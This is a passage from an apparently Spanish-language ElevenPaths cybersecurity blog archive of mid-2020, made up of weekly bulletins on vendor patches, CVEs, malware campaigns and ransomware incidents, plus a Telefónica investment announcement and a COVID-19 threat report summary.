CVE-2020-9646) y un problema importante de divulgación de información, que afectaría tanto a los usuarios de Windows como a los de MacOS que ejecutan la versión 14.2 o anterior de Media Encoder. Adobe Download Manager sería vulnerable a un único fallo crítico (CVE-2020-9688) que podría conducir a la ejecución de código arbitrario en el contexto actual del usuario a través de un ataque de inyección de comandos. Finalmente, Adobe Genunine Service y Adobe ColdFusion presentaban problemas importantes de escalado de privilegios. Información completa: https://helpx.adobe.com/security.html Actualizaciones de seguridad de Cisco Cisco ha publicado 31 parches de seguridad para corregir fallos en sus productos. Cinco de las vulnerabilidades son críticas, once cuentan con criticidad alta y quince media. CVE-2020-3330 CVSS 9.8: Credenciales predeterminadas estáticas en el Firewall VPN de Cisco Small Business RV110W Wireless-N que permitirían a un atacante no autenticado tomar el control del dispositivo. CVE-2020-3323 CVSS 9.8: Vulnerabilidad en Cisco Small Business RV110W, RV130, RV130W y RV215W que podría permitir a un atacante la ejecución remota de código debido a una validación inadecuada de entrada. CVE-2020-3144 CVSS 9.8: Fallo en la interfaz de gestión de Cisco RV110W Wireless-N VPN Firewall, RV130 VPN, RV130W Wireless-N Multifunction VPN, y RV215W Wireless-N VPN que permitiría la ejecución remota de comandos arbitrarios a un atacante no autenticado. CVE-2020-3331 CVSS 9.8: Fallo en las series de routers RV110W y RV215W que provocarían ejecución de código arbitrario debido a una incorrecta validación de entrada. CVE-2020-3140 CVSS 9.8: Vulnerabilidad en el producto Cisco Prime License Manager (PLM) que permitiría a un agente amenaza no autenticado escalar privilegios hasta nivel administrador en el sistema afectado. Desde el equipo de respuesta a incidentes de seguridad de productos de Cisco (PSIRT) aseguran que no se tiene constancia de explotación o uso malicioso de estas vulnerabilidades que la firma ya ha corregido. Más info: https://tools.cisco.com/security/center/publicationListing.x Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
17 de julio de 2020
Noticias de Ciberseguridad: Boletín semanal 4-10 de julio
Vulnerabilidad RCE en F5 BIG-IP (CVE-2020-5902) El pasado 1 de julio se dio a conocer una vulnerabilidad crítica (CVE-2020-5902 CVSSv3 10) de ejecución remota de código en el TMUI (Traffic Managemente User Interface) de F5, descubierta por el investigador de seguridad Mikhail Klyuchnikov. Un atacante no autenticado con acceso a la interfaz TMUI a través del puerto de gestión de BIG-IP o de Self IPs podría ejecutar órdenes del sistema de su elección, crear o eliminar ficheros, deshabilitar servicios e incluso ejecutar código Java. También son vulnerables aquellos BIG-IP en modo appliance. No obstante, conviene resaltar que esta vulnerabilidad no se expone en el plano de datos, sino únicamente en el plano de control. El atacante debe poder acceder a la gestión del dispositivo. Desde F5 recomiendan actualizar a una versión que corrija este problema; y esta necesidad de actualización se hace aún más evidente tras conocerse ya durante el fin de semana intentos de explotación activos, con un exploit público efectivo cuya PoC ha sido ya añadida ayer domingo al framework de explotación automatizada Metasploit. Además, el US Cybercom pidió el viernes pasado parchear de forma inmediata y urgente sin esperar al fin de semana. En caso de no poder aplicar la actualización, el fabricante ha proporcionado una serie de mitigaciones temporales. Desde la comunidad investigadora se han compartido reglas para la detección de explotación en sistemas IDS (Snort y Sigma) que pueden ser útiles tras realizar las actualizaciones para verificar que todo esté correcto y no se hayan producido intentos de aprovechamiento. Unos días más tarde de hacerse pública, los investigadores de seguridad Chase Dardaman y Rich Mirch con el equipo CriticalStart TeamAres han encontrado un bypass que permite la explotación del fallo en dispositivos donde se implementaron las medidas de mitigación. La explotación exitosa de dispositivos BIG-IP permite a los atacantes comprometer completamente el sistema, obtener credenciales de usuario o atravesar lateralmente la red interna del dispositivo. Los investigadores que descubrieron este bypass están trabajando con el Equipo de Respuesta a Incidentes de Seguridad (SIRT) de F5 para actualizar el aviso de seguridad CVE-2020-5902. Más detalles: https://support.f5.com/csp/article/K52145254 Ataques contra proveedores de servicios gestionados (MSPs) El 12 de junio, el servicio secreto estadounidense emitió una alerta a entidades norteamericanas advirtiendo de un aumento en el volumen de ataques a través del compromiso de proveedores de servicios gestionados (MSPs). Días después de esta alerta, el MSP ConnectWise parcheaba una vulnerabilidad en su API que habría sido aprovechada para realizar distintas intrusiones en su infraestructura. Los MSPs son entidades que gestionan parcial o totalmente la infraestructura IT de sus clientes a través de herramientas de administración remota, lo que les convierte en un vector de entrada potencial para acceder a la red de grandes compañías y realizar ataques. La alerta indica la identificación de ataques de estas características con el objetivo de comprometer sistemas PoS, realizar estafas BEC (Business Email Compromise) y distribuir ransomware (como Sodinokibi/REvil). Toda la info: https://www.zdnet.com/google-amp/article/us-secret-service-reports-an-increase-in-hacked-managed-service-providers-msps/ DXC identifica ataque de ransomware que afecta a su subisdiaria Xchanging El proveedor global de servicios y soluciones de TI DXC Technology anunció durante el fin de semana un ataque de ransomware en los sistemas de su subsidiaria Xchanging. Este es conocido como un proveedor de servicios gestionados para empresas de la industria de seguros, pero su lista de clientes incluye compañías de diversas áreas. DXC Technology notificó a sus inversores que Xchanging habría detectado un ataque de ransomware en algunos de sus sistemas. La compañía informó del incidente el 5 de julio, expresando su confianza en que no se propagó fuera de la red Xchanging. No está claro cuándo se detectó el ataque, pero por el momento, la investigación no ha revelado ninguna indicación de datos afectados. La compañía ha implementado una serie de medidas de contención y corrección para resolver esta situación y se encontraría trabajando activamente con los clientes afectados para restaurar el acceso a su entorno operativo lo más rápido posible. Por el momento tampoco se ha revelado el número de clientes afectados, así como información alguna sobre la familia del ransomware utilizado en el ataque. Más: https://www.dxc.technology/newsroom/press_releases/149112-dxc_identifies_ransomware_attack_on_part_of_its_xchanging_environment Troyano bancario Cerberus detectado en Google Play El equipo de ciberseguridad de Avast ha realizado una publicación en la que informa sobre la detección del troyano bancario Cerberus en el market Google Play dirigido a usuarios de Android España. Según los investigadores, este software malicioso habría permanecido ofuscado en una aplicación denominada “Calculadora de Moneda”. Esta aplicación fue aceptada por Google Play en algún momento del pasado mes de marzo y, si bien al principio no causaba ningún tipo de daño a las víctimas, una vez ganada la confianza de los usuarios la aplicación pasó a activar un código que permitía conectarse a un servidor Command & Control. A partir de ahí, el C&C ordenaba a la aplicación la descarga de una APK adicional en los dispositivos afectados que se trataría de Cerberus. Entre las funcionalidades de esta herramienta destaca la capacidad de crear superposiciones en las aplicaciones bancarias legítimas, con el fin de exfiltrar credenciales de la víctima, leer SMS para obtener códigos de acceso únicos u obtener detalles del segundo factor de autenticación. Se calcula que la aplicación maliciosa fue descargada más de 10.000 veces. Toda la info: https://blog.avast.com/avast-finds-banking-trojan-cerberus-on-google-play-avast Nueva vulnerabilidad en PAN-OS Apenas una semana después de corregir una vulnerabilidad de severidad crítica en PAN-OS (CVE-2020-2021), Palo Alto Networks ha abordado la corrección de un nuevo fallo grave en PAN-OS GlobalProtect. Se trata de una vulnerabilidad de inyección de comandos en el sistema operativo que permitiría a un atacante remoto no autenticado ejecutar comandos arbitrarios del sistema operativo con privilegios de root en dispositivos sin parchear. Ha recibido el identificador CVE-2020-2034 y una severidad CVSS 3.x de 8.1 ya que puede ser explotada por atacantes con acceso a la red de los servidores vulnerables como parte de un ataque más complejo que no requiere de interacción del usuario. Se encuentran afectadas las versiones de PAN-OS < 9.1.3, < 9.0.0 < 8.1.15, 8.0 y 7.1. El fallo no puede ser explotado si el portal de GlobalProtect no está habilitado y, además, el atacante necesita cierta información sobre la configuración del firewall o necesitará realizar algún tipo de ataque de fuerza bruta para poder explotar la vulnerabilidad. Desde Telefónica se están acometiendo las acciones necesarias para detectar y parchear la vulnerabilidad. Para saber más: https://www.bleepingcomputer.com/news/security/palo-alto-networks-fixes-another-severe-flaw-in-pan-os-devices/ Boletín de seguridad de Juniper En el día de ayer Juniper Networks publicó un boletín para parchear hasta 19 fallos y vulnerabilidades en sus productos. De entre todo el listado de parches publicados, destaca especialmente el publicado para la vulnerabilidad crítica CVE-2020-1654, CVSS 9.8. Se trata de un fallo por el cual un mensaje HTTP especialmente manipulado podría llevar a los productos de Juniper con el servicio de redirección ICAP (protocolo de adaptación de contenidos de internet) a una denegación de servicio o incluso a la ejecución remota de código. Este problema afecta a los productos Juniper SRX Series con sistema operativo Junos OS 18.1, 18.2, 18.3, 18.4, 19.1, 19.2 y 19.3. Se recomienda aplicar los parches del fabricante para solucionar este problema. Info completa: https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
10 de julio de 2020
Telefónica invierte en Nozomi Networks, compañía líder en seguridad y sistemas de control industrial
Su tecnología garantiza una ciberseguridad avanzada, una fiabilidad mejorada en las operaciones y una fácil integración en TI/TO La inversión, realizada a través de Telefónica Innovation Ventures, refuerza el acuerdo que mantienen ElevenPaths, la compañía de ciberseguridad de Telefónica Tech, y Nozomi Networks para ofrecer servicios conjuntos Telefónica, a través de su vehículo de corporate venture capital, Telefónica Innovation Ventures (TIV), ha realizado una inversión en Nozomi Networks Inc., una compañía líder en seguridad y sistemas de control industrial presente en 16 países que permite visualizar en tiempo real el riesgo cibernético, así como gestionar y mejorar la resiliencia de las operaciones industriales. Esta inversión supone una apuesta estratégica para incrementar la colaboración de Telefónica con este líder en ciberseguridad, especializado en proteger infraestructuras de tecnología operativa (TO) e Internet de las cosas (IoT) en sectores como el energético, el farmacéutico, el manufacturero, el logístico o la industria automotriz. Reconocido como el líder del mercado en seguridad OT e IoT, Nozomi Networks es valorado por su visibilidad operacional superior, detección avanzada de amenazas de OT e IoT y solidez en todos los despliegues. Las soluciones de Nozomi Networks soportan más de 3,6 millones de dispositivos en más de 2.400 instalaciones en los sectores de la energía, manufacturero, la minería, el transporte, los servicios públicos, la automatización de edificios, las ciudades inteligentes e infraestructuras críticas. Los productos de Nozomi Networks se pueden desplegar in situ y en la nube y abarcan TI, OT e IoT para automatizar el arduo trabajo de inventariar, visualizar y supervisar las redes de control industrial mediante el uso innovador de la inteligencia artificial. Los casos de uso se extienden más allá de la ciberseguridad e incluyen la solución de problemas, la gestión de activos y el mantenimiento predictivo. “Con esta inversión en Nozomi Networks queremos reforzar la apuesta de Telefónica por la ciberseguridad en entornos industriales y activos críticos expuestos a continuas y cambiantes amenazas. Para ayudar a minimizar esos riesgos son muy importantes los sistemas de monitorización y detección de amenazas y en este campo la tno..ecnología que desarrolla Nozomi Networks con la utilización de la inteligencia artificial es fundamental para nuestros clientes industriales”. Guenia Gawendo, directora de Telefónica Innovation Ventures La inversión a través de TIV refuerza el acuerdo de colaboración anunciado a principios de año entre ElevenPaths, la compañía de ciberseguridad integrada en Telefónica Tech, y Nozomi Networks. Este acuerdo permite a los operadores de infraestructuras industriales obtener visibilidad avanzada y gestionar su seguridad a través de una solución MSSP inteligente. El servicio de seguridad de ElevenPaths integra la solución de Nozomi Networks que proporciona capacidades de gestión de riesgos para todos los clientes con redes industriales e infraestructuras críticas en sectores como el energético y servicios públicos. “Contar con el apoyo de una de las operadoras de telecomunicaciones más importantes del mundo y líder en la oferta y desarrollo de servicios de seguridad, nos ayuda a reforzar la visibilidad de la tecnología de Nozomi Networks. Telefónica entiende muy bien que no solo se necesita proteger las redes, sino que también es fundamental invertir en la detección, monitorización y mitigación de los riesgos en materia de OT e IoT.” Edgard Capdeville, CEO de Nozomi Networks Inc En los próximos cuatro años, se espera una tasa de crecimiento anual compuesta (CAGR) de 23% en el mercado de la seguridad en los sistemas de control industrial (ICS). La financiación total de Nozomi Networks hasta la fecha supera los 54 millones de dólares con inversores de primer nivel, incluyendo GGV Capital, Lux Capital, Energize Ventures y Planven Investments. La reciente participación de Telefónica Innovation Ventures, amplía el porfolio de 11 startups invertidas, partners tecnológicos vinculados con la estrategia global del grupo y la transformación de la industria telco. Nota de prensa completa:
7 de julio de 2020
Noticias de Ciberseguridad: Boletín semanal 27 de junio-3 de julio
Adobe, Mastercard y Visa advierten de la necesidad de actualizar a Magento 2.x Los proveedores de pagos Visa y Mastercard, junto con Adobe, han intentado por última vez convencer a los propietarios de tiendas online para que actualicen sus plataformas a la rama 2.x de Magento. El 30 de junio, la plataforma Magento 1.x ha alcanzado su fecha oficial de fin de vida (EOL), después de la cual Adobe planea dejar de ofrecer actualizaciones de seguridad. La semana pasada Adobe lanzó las últimas actualizaciones de seguridad para Magento 1.x, pero, lamentablemente, a pesar de que los propietarios de las tiendas sabían desde finales de 2018 que se acercaba este EOL, muchos no han actuado. Alrededor del 75% de las tiendas Magento de hoy todavía funcionan con la versión 1.x. Una vez que la rama 1.x llega al EOL, cualquier nuevo exploit de Magento 1.x será un desastre para el mercado de tiendas online puesto que no existirán parches disponibles. Debido a la gran cantidad de cambios importantes entre las dos versiones, muchos propietarios de tiendas online han optado por permanecer en la versión 1.x anterior y evitar tener que volver a implementar sus tiendas desde cero. Más información: https://www.zdnet.com/article/adobe-mastercard-visa-warn-online-store-owners-of-magento-1-x-eol/ Vulnerabilidad crítica en PAN-OS Palo Alto ha emitido un aviso de seguridad para informar de una nueva vulnerabilidad (CVE-2020-2021), a la que se otorga en el boletín del fabricante una severidad base máxima, CVSSv3 de 10, ya que se trata de una vulnerabilidad remota, de baja complejidad, sin requisitos previos ni necesidad de interacción con terceros. Se trata de una vulnerabilidad de evasión de autenticación cuando la autenticación SAML se encuentra habilitada y la opción Validate Identity Provider Certificate se encuentra deshabilitada. El aprovechamiento de la vulnerabilidad para los productos GlobalProtect Gateways, GlobalProtect Portal, Clientes VPN, Captive Portal y Prisma Access, permitiría que un usuario malicioso con acceso de red al servidor vulnerable lograra el acceso al recurso, si es permitido por la configuración del dispositivo y políticas aplicadas. En el caso de PAN-OS e interfaz web de Panorama el aprovechamiento de la vulnerabilidad permitiría que un usuario remoto no autenticado con acceso de red al sistema vulnerable lograra acceder como administrador. Por el momento no hay constancia del aprovechamiento de la vulnerabilidad, si bien se recomienda parchear con urgencia. Por el momento no hay constancia del aprovechamiento de la vulnerabilidad, si bien tras conocerse la información desde Cibercomando de Estados Unidos (USCC) se publicaba un tweet alertando de la necesidad de parchear con urgencia. Se recomienda, antes de realizar la actualización, consultar las indicaciones del fabricante en el boletín y realizar los pasos previos recomendados. Desde Telefónica se están acometiendo las acciones necesarias para detectar y parchear la vulnerabilidad. Todos los detalles: https://security.paloaltonetworks.com/CVE-2020-2021 Actualizaciones de seguridad de Microsoft Microsoft ha publicado parches de emergencia que abordan dos fallos en la librería de Codecs de Windows 10 y Windows Server 2019. Las dos vulnerabilidades fueron reportadas a la firma por el investigador Abdul-Aziz Hariri el pasado mes de marzo. CVE-2020-1425: Con una severidad crítica, en el caso de ser explotada permitiría a un agente amenaza acceder a información valiosa del sistema afectado, abriendo la posibilidad a un uso futuro con el objetivo de comprometer el equipo de la víctima. CVE-2020-1457: Con una severidad grave, esta vulnerabilidad podría permitir a un atacante ejecutar código arbitrario en un sistema afectado. Desde Microsoft, aseguran que los clientes y usuarios no necesitan tomar acciones para solventar este problema, dado que recibirán las actualizaciones de manera automática. Para saber más: https://searchsecurity.techtarget.com/news/252485557/Microsoft-fixes-Windows-Codecs-flaws-with-emergency-patches Vulnerabilidades críticas en Apache Guacamole Investigadores de Check Point han descubierto múltiples vulnerabilidades críticas de RDP inverso en Apache Guacamole, una aplicación de escritorio remoto y de código abierto utilizada por los administradores de sistemas para acceder y administrar equipos Windows y Linux de forma remota. Estas vulnerabilidades permitirían a un atacante que hubiese vulnerado el equipo previamente, volver a atacar a través de Guacamole en el momento en el que un usuario se conectase de manera remota a su equipo infectado. Esto permitiría al actor amenaza lograr el control total del servidor de Apache Guacamole e interceptar y controlar todas las sesiones conectadas al servidor. Desde Apache ya se han desplegado parches para mitigar esta amenaza. Más detalles: https://blog.checkpoint.com/2020/07/02/hole-y-guacamole-fixing-critical-vulnerabilities-in-apaches-popular-remote-desktop-gateway/ Campaña de distribución de Agent Tesla suplantando a empresas de logística Esta semana se ha detectado una nueva oleada de una campaña de malspam dirigida a usuarios y entidades en el ámbito español que tiene por objeto la distribución del keylogger & infostealer Agent Tesla. Los correos electrónicos simulan provenir de la empresa de mensajería TIBA, de la misma forma que la pasada semana se suplantaba a la empresa GLS. El contenido de los mismos hace referencia a un supuesto envío que el usuario está esperando y sobre el cual puede consultar mayores detalles en un enlace inserto en el correo. Este enlace dirige a un servicio de alojamiento gratuito de ficheros (mediafire.com) donde se descarga un fichero comprimido en formato 7z que contendrá un ejecutable malicioso con el nombre "Detalles de envio.exe". Toda la info: https://blogs.protegerse.com/2020/07/02/nueva-campana-de-agent-tesla-vuelve-a-utilizar-email-suplantando-a-empresa-de-transporte Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
3 de julio de 2020
Ciberamenazas durante la COVID-19, una investigación de la Telco Security Alliance
La Telco Security Alliance (TSA) está formada por AT&T (AT&T Cybersecurity), Etisalat (HelpAG), Singtel (Trustwave), SoftBank y Telefónica (ElevenPaths). Esta alianza tiene como objetivo ofrecer a las empresas información integral sobre ciberseguridad para ayudarlas a abordar la creciente amenaza de los ciberataques y el panorama de amenazas en evolución. Tres de los miembros, a través de sus unidades de ciberseguridad (AT&T Cybersecurity (Alien Labs), Singtel (Trustwave) y Telefónica (ElevenPaths), han elaborado un informe con los descubrimientos más relevantes relacionados con la COVID-19 en los últimos meses. Por parte de ElevenPaths han participado Miguel Ángel de Castro, José Ramón Palanco, Helene Aguirre Mindeguia y Sebastián García de Saint-Léger. Evolución de las ciberamenazas durante la pandemia El panorama de amenazas cibernéticas ha evolucionado rápidamente desde el comienzo de la pandemia de la COVID-19. Los miembros de la TSA han observado un fuerte aumento de la actividad maliciosa aprovechando la situación de vulnerabilidad de naciones y organizaciones. Los ciberdelicuentes tratan cada vez más de beneficiarse financieramente con métodos oportunistas, obtienen acceso no autorizado a las redes para obtener beneficios estratégicos inmediatos y a largo plazo, y difunden información falsa con un objetivo político determinado. La TSA ha investigado a múltiples actores que actúan de forma continua en la esfera del cibercrimen y han atacado durante la pandemia a organizaciones privadas y agencias gubernamentales. En última instancia, la pandemia de COVID-19 ha proporcionado nuevas oportunidades que los atacantes comenzaron a aprovechar rápidamente y seguirán haciéndolo durante el mayor tiempo posible. Tanto las organizaciones de protección contra el crimen como los estados nacionales han respondido históricamente a los eventos de gran escala de manera similar, sin embargo, el impacto en todo el mundo de COVID-19 ha elevado aparentemente el listón del valor operacional de los ataques. Para dar una idea de este aumento, el crecimiento en el número de indicadores de compromiso (IoCs) relacionados con la COVID-19 compartidos por la TSA aumentó un 2000% solo entre febrero y marzo de este año. A continuación, se puede ver la distribución por tipo de IoCs recogidos desde el comienzo de la pandemia: Distribución por tipo de IoCs desde el comienzo de la pandemia Esta gráfica nos muestra el porcentaje del reparto de indicadores de compromiso y nos da una idea del tipo de actividad maliciosa que se ha generado a lo largo de la pandemia. Destaca notablemente el fragmento de los dominios maliciosos, que abarcan el 44% del total de indicadores y que denota la cantidad ingente de dominios que se han creado con fines fraudulentos. Las ciberamenazas investigadas tienen múltiples intereses (económicos, conseguir acceso a sitios restringidos para tener ventajas estratégicas, desinformación, etc.) y provienen de diferentes tipos de actores, como organizaciones criminales u organizaciones vinculadas con estados. Aportes a la investigación de ElevenPaths Vendetta ataca de nuevo: ataques de phishing alrededor del mundo Un ejemplo del trabajo realizado por parte de los analistas de ElevenPaths fue el descubrimiento del grupo cibercriminal conocido como Vendetta centrado en campañas de phishing utilizando correo electrónico, principalmente utilizando la COVID-19, y activo en multitud de países como Taiwan, China, Australia, Egipto o México. En concreto, se detectó un ataque de phishing a través de correos electrónicos haciéndose pasar por el director del Centro de Control y Prevención de enfermedades de Taiwán. En estos correos se informaba al receptor de ser sospechoso de estar infectado de COVID-19 tras haberse detectado casos positivos en su cercanía y le obligaba a someterse al test. Además, adjuntaban un archivo con las instrucciones sobre cómo hacerlo. Este archivo contenía malware con el que los atacantes infectaban a las víctimas. Hustleking, escondiendo RATs en ZIPs En este caso, HustlKing lanzó una campaña de email donde adjuntaban un ZIP ejecutable que en realidad contiene RATS (Remote Access Troyans) comprimidos. Para engañar a las víctimas, cambiaban el icono del zip por uno de PDF: Estos RATs, son programas ejecutables que contienen Keyloggers, roban contraseñas, sirven para descargar otros payloads, y para descargar ramsonware. Una vez que la víctima hace click sobre el ZIP, este se ejecuta automáticamente y se hace persistente; esto es que, aunque se reinie, vuelve a arrancar con el equipo. Una vez que los programas se ejecutan en segundo plano y comienzan a robar la información, directamente se la comunicaban via Pastebin a un C&C (Comand and Control o Mando y control), que es una infraestructura mando y control que consta de servidores y otros elementos que son usados para controlar los malware. Conclusiones de la investigación En general, y como conclusión, cabe destacar el buen trabajo realizado por la industria de la ciberseguridad, que está tomando las acciones adecuadas para hacer frente al gran aumento de los ciberataques durante esta crisis sanitaria de escala global. Como se ve en este informe, la pandemia de COVID-19 ha sido objeto de diversos abusos malintencionados por parte de grupos adversarios patrocinados tanto por estados como otros grupos oportunistas. A nivel mundial, los atacantes han desplazado los ataques a temas y objetivos centrados en COVID-19, y se espera que estos ataques sigan evolucionando hacia nuevas áreas que presenten la mayor probabilidad de éxito para completar la misión del adversario. Los atacantes oportunistas, que a menudo buscan beneficios económicos, vieron la pandemia convertirse en un tema ideal en los objetivos masivos, ya que COVID-19 ha sido universalmente el tema más importante. Informe completo disponible aquí:
1 de julio de 2020
Noticias de Ciberseguridad: Boletín semanal 20-26 de junio
Millones de registros de usuarios expuestos en un servidor de Oracle El investigador de seguridad Anurag Sen ha encontrado una base de datos expuesta con millones de registros perteneciente a la empresa BlueKai, propiedad de Oracle. Esta compañía es una de las mayores empresas de seguimiento web que acumula datos de terceros para su uso en marketing inteligente. El incidente de seguridad se produjo tras haber dejado un servidor abierto sin contraseña, lo que hizo que millones de registros de personas quedaran expuestos. Entre los datos afectados se encuentran: nombres y apellidos de personas, correos electrónicos, direcciones postales, actividad de navegación en internet detallada, compras, etc., ya que BlueKai recopila todos estos datos en bruto en la red para su posterior venta ya de forma anonimizada. Cabe mencionar que Oracle recibió el aviso del investigador y ha llevado a cabo una investigación interna para resolver el incidente. Más información: https://techcrunch.com/2020/06/19/oracle-bluekai-web-tracking/ Nueva campaña maliciosa sobre COVID-19 utilizando Trickbot El equipo de investigadores de Trustwave ha detectado una nueva campaña maliciosa relacionada con el COVID-19 que está infectando a las víctimas con el software malicioso Trickbot. En esta ocasión, agentes amenaza utilizan campañas de phishing como vector de entrada para hacerse pasar por una organización de voluntarios que quieren ayudar económicamente a aquellos que lo necesitan como consecuencia de la pandemia. Asimismo, se incita a las víctimas a abrir dos archivos maliciosos idénticos adjuntos en el correo y cuyo formato es JNLP. Una vez que la víctima ejecuta este tipo de documentos se produce la infección con la descarga y ejecución del software “map.jar” y que redirige a la víctima a una página oficial de la OMS con el objetivo de engañar a la víctima. Una vez hecho este paso, el malware procede en una segunda fase a descargar el troyano bancario Trickbot que, además del robo de credenciales bancarias, tiene otras funciones como el robo de información o descarga de otros malware. Desde Trustware indican que es la primera vez que se utiliza archivos JNLP como infección de TrickBot, y que el uso de este formato de archivos para infectar a víctimas no es común. Todos los detalles: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trickbot-disguised-as-covid-19-map/ AMD reconoce vulnerabilidades SMM Callout AMD ha dado a conocer tres vulnerabilidades de criticidad alta, a las que la compañía se refiere como SMM Callout, y que afectarían a algunos de sus equipos portátiles y procesadores integrados entre 2016 y 2019. Estos fallos podrían permitir a un atacante con acceso físico a equipos con procesadores AMD integrados o a equipos previamente infectados con malware, ejecutar código arbitrario sin ser detectado por el sistema operativo. La compañía publicó el 8 de junio la corrección para uno de los tres errores (CVE-2020-14032). Sin embargo, AMD ha anunciado que planea lanzar el parche para corregir los dos fallos restantes (CVE-2020-12890 y el tercero sin CVE asignado) a finales de este mes de junio. Para saber más: https://threatpost.com/amd-fixes-for-high-severity-smm-callout-flaws-upcoming/156787/ Escaneos de Sodinokibi/REvil en busca de software PoS Investigadores de Symantec han detectado una campaña dirigida del ransonmware Sodinokibi, también conocido como REvil, en la que los agentes amenaza estarían escaneando las redes de sus víctimas en busca de tarjetas de crédito o software de terminales de punto de venta (POS). Los atacantes estarían utilizando el malware Cobalt Strike para desplegar el ransomware en los sistemas de las víctimas. Según los investigadores, durante esta campaña, se detectó que ocho compañías habrían sido atacadas con el malware Cobalt Strike, y que tres de ellas fueron posteriormente infectadas con Sodinokibi. Además, los atacantes estarían utilizando herramientas legítimas como el software de control remoto NetSupport para llevar a cabo esta campaña. Hasta la fecha, se desconoce si los atacantes están dirigiéndose contra los terminales de punto de venta para cifrar su software o para obtener beneficios por otros medios. Más info: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos VMware corrige vulnerabilidades críticas VMware ha publicado actualizaciones de seguridad que corrigen fallos en los productos ESXi, Workstation y Fusion. Entre estas vulnerabilidades se encuentra una de severidad crítica, catalogada como CVE-2020-3962 y con un CVSSv3 de 9.3, que afecta al dispositivo SVGA y que podría permitir a un agente amenaza ejecutar código arbitrario en el hypervisor desde una máquina virtual. Para mitigar esta amenaza se recomienda a los usuarios actualizar VMware Fusion a la versión 15.5.5, y VMware ESXi a las versiones ESXi_7.0.0-1.20.16321839, ESXi670-202004101-SG, o ESXi650-202005401-SG. Puesto que el fallo reside en la aceleración de 3D Graphics, para paliar este fallo también se puede deshabilitar este componente en caso de no poder actualizar estos software inmediatamente, evitando así una posible explotación. En las demás actualizaciones de seguridad publicadas se han corregido otras 9 vulnerabilidades con CVSSv3 desde 4.0 hasta 8.1. Todos los detalles: https://www.vmware.com/security/advisories/VMSA-2020-0015.html Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
26 de junio de 2020
Claves para implantar una Identidad Digital Corporativa 360
En los últimos años, y en paralelo a los procesos acelerados de transformación digital corporativa, un gran problema ha ido creciendo inadvertidamente en las estructuras fundamentales de toda organización. Nos referimos a los inconvenientes derivados de una gestión ineficiente de las identidades y el acceso que, por un lado, lastran la productividad y merman la expansión del negocio y, por otro, afectan de manera significativa a la seguridad de la organización. Factores causantes de los problemas relativos a la gestión de identidad: Evolución tecnológica no planificada basada en soluciones parciales y aisladas. El crecimiento inorgánico corporativo y el retraso de la integración de los directorios de identidades. Falta de procesos estándar de gestión del ciclo de vida y una política de roles y autorizaciones. Demora en implantar medidas correctivas e implantar una estrategia corporativa de identidad. Este paper se inicia con la descripción de los problemas generados por una gestión ineficiente de la Identidad corporativa para a continuación describir un modelo de gobierno de la identidad basado en la metodología de CARTA de Gartner. Por último, se detallan las características que debe tener una solución completa de gestión de identidades y acceso. Accede al paper completo, disponible en nuestra página web: Claves para implantar una Identidad Digital Corportiva 360.
25 de junio de 2020
Noticias de Ciberseguridad: Boletín semanal 13-19 de junio
Vulnerabilidades Ripple 20 en software TCP/IP Investigadores de JSOF han descubierto 19 vulnerabilidades 0-day, denominadas en su conjunto Ripple 20, en la librería de software TCP/IP desarrollada por Treck que afectarían a más de 500 fabricantes en todo el mundo. Los millones de dispositivos afectados por estos fallos se encuentran en todas partes, incluyendo hogares, hospitales, industrias, centrales nucleares y sector retail, entre otros. Un atacante remoto no autenticado podría utilizar paquetes de red especialmente diseñados para causar una denegación de servicio, filtrar información o ejecutar código arbitrario. De las 19 vulnerabilidades, hay 4 críticas con puntuación CVSS de más de 9 (dos de ellas, CVE-2020-11896 y CVE-2020-11897 con un score de 10), las cuales permitirían a un atacante ejecutar código arbitrario en los dispositivos vulnerables de forma remota. Algunas vulnerabilidades ya han sido parcheadas por Treck en la versión 6.0.1.67. Sin embargo, muchos dispositivos no van a recibir parches, por lo que se recomienda minimizar la exposición a internet de los mismos. Más información: https://www.jsof-tech.com/ripple20/ Adobe corrige 18 fallos críticos Adobe ha publicado un parche extraordinario de actualizaciones de seguridad para abordar 18 fallos críticos que podrían permitir a los atacantes ejecutar código arbitrario en sistemas que ejecutan versiones vulnerables de Adobe After Effects, Illustrator, Premiere Pro, Premiere Rush y Audition en dispositivos Windows y MacOS. Las vulnerabilidades encontradas en estos cinco productos de Adobe eran causadas por lectura y escritura fuera de límites, desbordamiento de pila y errores de corrupción de la memoria. Adobe también corrigió una vulnerabilidad de gravedad "importante" (CVE-2020-9666) que permitía la divulgación de información que afectaba a Adobe Campaign Classic. Adobe aconseja a los usuarios que actualicen las aplicaciones vulnerables a las versiones más recientes utilizando el mecanismo de actualización de Creative Cloud para bloquear los ataques que podrían intentar explotar las instalaciones sin parches. Todos los detalles: https://helpx.adobe.com/security.html Análisis vulnerabilidad RCE en Microsoft SharePoint Server Investigadores de Zero Day Initiative han publicado un análisis de la vulnerabilidad de ejecución remota de código en Microsoft SharePoint Server CVE-2020-1181, corregida este mes de junio. El fallo permitiría a un usuario autenticado ejecutar código .NET arbitrario en el servidor vulnerable. Para que el ataque tenga éxito, el atacante debería tener permisos para "agregar y personalizar páginas" en el sitio de SharePoint objetivo. Sin embargo, la configuración por defecto en los servidores de SharePoint permite a los usuarios autenticados realizar dicha función. Por lo tanto, el actor amenaza podría crear la página 